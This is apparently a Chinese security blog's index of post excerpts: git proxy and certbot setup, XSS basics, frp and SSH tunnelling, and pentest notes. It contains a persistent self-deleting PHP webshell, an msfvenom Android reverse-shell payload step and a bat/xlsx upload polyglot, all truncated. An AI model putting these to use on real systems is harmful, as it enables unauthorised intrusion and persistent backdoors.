github国内连不上,git clone用不了,以前都是直接下载zip,但这样更新不好更新。 1git config --global https.proxy socks5://127.0.0.1:7890 socks5也可以换成http,具体情况看端口开的是什么代理 https.proxy是对所有https协议的链接使用代理,http.proxy是对http协议的链接使用代理,但github一般都是https 查看代理:git config --global --get https.proxy 取消代理:git config --global --unset https.proxy
当自己的网站需要https的时候,就要申请证书。很多地方都可以申请免费证书,Let’s Encrypt就是其中之一。 用certbot自动申请,安装certbot 123apt-get updateapt-get install certbotapt-get install python-certbot-nginx 如果已经在**/etc/nginx/**里配置好了http站点,直接执行: 1certbot --nginx -d <example.com> <example.com>替换为实际的域名 等一会儿显示Successfully
老爹还有一件事:高贵的马儿驱除体内一切外力,不论怎么删除它都会死而复生 不死马是什么一个经典的不死马是这样的: 123456789101112<?php ignore_user_abort(true);# 忽略用户连接,连接断了也不停止执行 set_time_limit(0);# 脚本最大执行时间(秒),默认是30秒,设为0永不超时 unlink(__FILE__);# 删除此文件,可选,不写会留下这个文件容易被查到 $file = 'test.php'; $code = '<?php if(md5($_GET["
博客之前一直用的随机图api,虽然省心,但是加载慢,而且加载的角色都不认识。发现绳网情报站有绝区零所有角色的影画,所以写个爬虫全都抓下来当封面用。中间遇到好多新技巧,记录一下。 分析来源https://baike.mihoyo.com/zzz/wiki/ 先分析页面,打开影画页面,复制影画展示3的图片url,发现是这样的: 1https://act-upload.mihoyo.com/nap-obc-indep/2024/11/06/76099754/93171af7d069601a30c8129ebbfaff34_7755247229681328322.png?x-oss-process=i
情人节.2025-02-14.log 20:00 《我绝对不会碰你》20:15 《你好香啊》20:30 《我可以亲你一下吗》20:35 《好像有点热是不是》20:40 《要不你把衣服脱了吧》20:50 《你身体好软》20:55 《可以抱着你吗》21:00 《你太迷人了》21:15 《什么?你也做web?》21:20 《啊?你今天还没刷?》21:23 《来,我来陪做》21:25 《什么?你不知道SSTI?》21:30 《没事,我帮你看看你的基本功》21:50 《没事的宝宝,你还不熟悉jinja2》22:00 《宝宝,我教你用Fenjing》23:10 《Fenjing都用不明白吗?》23:40
今天遇见一个存xlsx文件的站,上传的时候只校验后缀,提交到文件列表里的xlsx文件会被解析,解析成功才能从其他接口用id的形式访问,解析失败则不能访问。 添加到文件列表里的时候,没有对文件名进行校验,可以修改为任意后缀。 众所周知Windows下能执行代码的最宽松的文件格式就是bat了,所以尝试在xlsx文件能被正常解析的情况下插入bat格式的命令。 直接在文件头里插入不行,解析会出错。大部分情况下wps能正常打开,但是上传后解析失败。 直接在文件末尾插入也不行,因为bat执行遇到\x00字节的时候会停止 所以要用注释把xlsx文件中的\x00注释掉 bat里注释有很多种(虽然很多都不是标准
简介跨站脚本攻击(Cross-site Scripting),本质是html注入导致的js代码执行。 由于CSS这个缩写被Cascading Style Sheets(层叠样式表)占用了,所以Cross-site Scripting(跨站脚本攻击)被缩写为XSS。 xss一般的利用方法就是导入其他站点的脚本来执行,所以叫跨站脚本攻击。但是由于直接执行js语句也可以达到相同效果,所以测试时只要可以执行js代码就算作漏洞。 漏洞分类反射型反射型xss的特点是payload经过服务器,但不经过数据库,即时触发。服务器直接将接收的payload拼接在html中返回导致html注入触发xss。 举一个简
frp是什么frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 在内网渗透中,由于内网主机没有公网ip,本地无法直接对内网访问或扫描,这时可以搭建代理,frp就是一种常用的代理工具。 frp怎么用frp分为服务端和客户端,服务端放在本地可以直接访问的服务器上(通常是自己的公网服务器),客户端放在靶机上。简单配置如下: frps.ini: 1234[common]bind_port = 5000# auth tokentoken = 可选,防止
今儿遇见个站,有个功能是上传apk做兼容性测试,那一看能上传文件执行就想到传马上线 安装msf: 1curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 生成马: 1msfvenom -p android/meterpreter/re
基本所有的机器都有ssh,所以用ssh开隧道是最方便的。 ssh -R:远程->本地->目标1ssh -R [远程主机的监听地址:]远程主机的监听端口:目标主机的ip:目标主机的端口 root@远程主机ip 其中,[远程主机的监听地址:]可以省略,省略后默认是127.0.0.1 这种用法一般是用来做内网穿透的,例如服务器公网ip:123.123.123.123,我要把内网的192.168.1.100的web服务映射出去,就可以: 1ssh -R 0.0.0.0:80:192.168.1.100:80 root@123.123.123.123 要改ssh配置,/etc&